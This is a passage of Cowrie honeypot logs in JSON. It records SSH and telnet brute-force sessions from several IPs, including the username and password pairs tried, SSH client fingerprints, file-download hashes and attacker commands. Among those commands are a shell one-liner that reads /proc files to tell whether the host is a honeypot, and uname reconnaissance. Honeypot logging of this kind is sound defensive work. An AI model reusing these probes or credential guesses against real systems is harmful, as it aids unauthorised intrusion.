512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:56:59.252292Z","src_ip":"51.79.164.132","session":"4f3c29e451ba"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T08:57:00.588175Z","src_ip":"212.227.125.160","session":"95ccbfea8101"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:57:00.589157Z","src_ip":"212.227.125.160","session":"95ccbfea8101"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123456","message":"login attempt [app/app123456] failed","sensor":"my-vps","timestamp":"2025-08-28T08:57:00.590009Z","src_ip":"51.79.164.132","session":"4f3c29e451ba"}
{"eventid":"cowrie.session.closed","duration":"11.1","message":"Connection lost after 11.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:57:00.590844Z","src_ip":"212.227.125.160","session":"95ccbfea8101"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:57:02.144351Z","src_ip":"51.79.164.132","session":"4f3c29e451ba"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":57162,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba0a0cd1f2b6","protocol":"ssh","message":"New connection: 185.93.89.7:57162 (1.2.3.4:22) [session: ba0a0cd1f2b6]","sensor":"my-vps","timestamp":"2025-08-28T08:57:04.225774Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:57:04.228293Z","src_ip":"185.93.89.7","session":"ba0a0cd1f2b6"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:57:04.244436Z","src_ip":"185.93.89.7","session":"ba0a0cd1f2b6"}
{"eventid":"cowrie.login.success","username":"root","password":"Index2025!","message":"login attempt [root/Index2025!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:57:04.302161Z","src_ip":"185.93.89.7","session":"ba0a0cd1f2b6"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:57:04.320791Z","src_ip":"185.93.89.7","session":"ba0a0cd1f2b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56948,"dst_ip":"1.2.3.4","dst_port":23,"session":"cf4b7b18fc6b","protocol":"telnet","message":"New connection: 212.227.125.160:56948 (1.2.3.4:23) [session: cf4b7b18fc6b]","sensor":"my-vps","timestamp":"2025-08-28T08:57:10.678698Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:57:10.763613Z","src_ip":"212.227.125.160","session":"cf4b7b18fc6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:57:11.197401Z","src_ip":"212.227.125.160","session":"cf4b7b18fc6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:57:21.197154Z","src_ip":"31.214.172.54","session":"370347eaddae"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T08:57:21.197829Z","src_ip":"31.214.172.54","session":"370347eaddae"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:57:21.198552Z","src_ip":"31.214.172.54","session":"370347eaddae"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T08:57:21.200313Z","src_ip":"31.214.172.54","session":"370347eaddae"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T08:57:21.201106Z","src_ip":"31.214.172.54","session":"370347eaddae"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T08:57:21.202393Z","src_ip":"31.214.172.54","session":"370347eaddae"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T08:57:21.203367Z","src_ip":"31.214.172.54","session":"370347eaddae"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T08:57:21.204237Z","src_ip":"31.214.172.54","session":"370347eaddae"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T08:57:21.205115Z","src_ip":"31.214.172.54","session":"370347eaddae"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T08:57:21.205958Z","src_ip":"31.214.172.54","session":"370347eaddae"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T08:57:21.207181Z","src_ip":"31.214.172.54","session":"370347eaddae"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T08:57:21.353943Z","src_ip":"31.214.172.54","session":"370347eaddae"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:57:21.354839Z","src_ip":"31.214.172.54","session":"370347eaddae"}
{"eventid":"cowrie.session.closed","duration":"41.9","message":"Connection lost after 41.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:57:21.356033Z","src_ip":"31.214.172.54","session":"370347eaddae"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":39754,"dst_ip":"1.2.3.4","dst_port":22,"session":"9185cc48d417","protocol":"ssh","message":"New connection: 51.79.164.132:39754 (1.2.3.4:22) [session: 9185cc48d417]","sensor":"my-vps","timestamp":"2025-08-28T08:57:25.004984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:57:25.082853Z","src_ip":"51.79.164.132","session":"9185cc48d417"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:57:25.571078Z","src_ip":"51.79.164.132","session":"9185cc48d417"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic123","message":"login attempt [elastic/elastic123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:57:26.804794Z","src_ip":"51.79.164.132","session":"9185cc48d417"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:57:28.459928Z","src_ip":"51.79.164.132","session":"9185cc48d417"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":37870,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9fa07027cb6","protocol":"ssh","message":"New connection: 185.93.89.7:37870 (1.2.3.4:22) [session: b9fa07027cb6]","sensor":"my-vps","timestamp":"2025-08-28T08:57:40.372406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:57:40.428400Z","src_ip":"185.93.89.7","session":"b9fa07027cb6"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:57:40.429207Z","src_ip":"185.93.89.7","session":"b9fa07027cb6"}
{"eventid":"cowrie.login.success","username":"root","password":"index2025@","message":"login attempt [root/index2025@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:57:40.510533Z","src_ip":"185.93.89.7","session":"b9fa07027cb6"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:57:40.531095Z","src_ip":"185.93.89.7","session":"b9fa07027cb6"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":37876,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a0cdc91abe8","protocol":"ssh","message":"New connection: 185.93.89.7:37876 (1.2.3.4:22) [session: 8a0cdc91abe8]","sensor":"my-vps","timestamp":"2025-08-28T08:57:49.914314Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:57:49.916084Z","src_ip":"185.93.89.7","session":"8a0cdc91abe8"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:57:49.940217Z","src_ip":"185.93.89.7","session":"8a0cdc91abe8"}
{"eventid":"cowrie.login.success","username":"root","password":"Index2025@","message":"login attempt [root/Index2025@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:57:50.003614Z","src_ip":"185.93.89.7","session":"8a0cdc91abe8"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:57:50.023424Z","src_ip":"185.93.89.7","session":"8a0cdc91abe8"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":47480,"dst_ip":"1.2.3.4","dst_port":22,"session":"67f892d020e9","protocol":"ssh","message":"New connection: 51.79.164.132:47480 (1.2.3.4:22) [session: 67f892d020e9]","sensor":"my-vps","timestamp":"2025-08-28T08:57:51.004145Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:57:51.093879Z","src_ip":"51.79.164.132","session":"67f892d020e9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:57:51.527284Z","src_ip":"51.79.164.132","session":"67f892d020e9"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssw0rd","message":"login attempt [root/p@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:57:52.833802Z","src_ip":"51.79.164.132","session":"67f892d020e9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:57:53.216199Z","src_ip":"51.79.164.132","session":"67f892d020e9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:57:53.216902Z","src_ip":"51.79.164.132","session":"67f892d020e9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:57:53.713543Z","src_ip":"51.79.164.132","session":"67f892d020e9"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:57:53.714851Z","src_ip":"51.79.164.132","session":"67f892d020e9"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":40268,"dst_ip":"1.2.3.4","dst_port":22,"session":"e655dad7128d","protocol":"ssh","message":"New connection: 51.79.164.132:40268 (1.2.3.4:22) [session: e655dad7128d]","sensor":"my-vps","timestamp":"2025-08-28T08:58:16.708255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:58:16.827408Z","src_ip":"51.79.164.132","session":"e655dad7128d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:58:17.275025Z","src_ip":"51.79.164.132","session":"e655dad7128d"}
{"eventid":"cowrie.login.failed","username":"guest","password":"abc123","message":"login attempt [guest/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:58:18.613853Z","src_ip":"51.79.164.132","session":"e655dad7128d"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:58:20.301409Z","src_ip":"51.79.164.132","session":"e655dad7128d"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":36824,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2e58e11f5e8","protocol":"ssh","message":"New connection: 185.93.89.7:36824 (1.2.3.4:22) [session: e2e58e11f5e8]","sensor":"my-vps","timestamp":"2025-08-28T08:58:25.626516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:58:25.680578Z","src_ip":"185.93.89.7","session":"e2e58e11f5e8"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa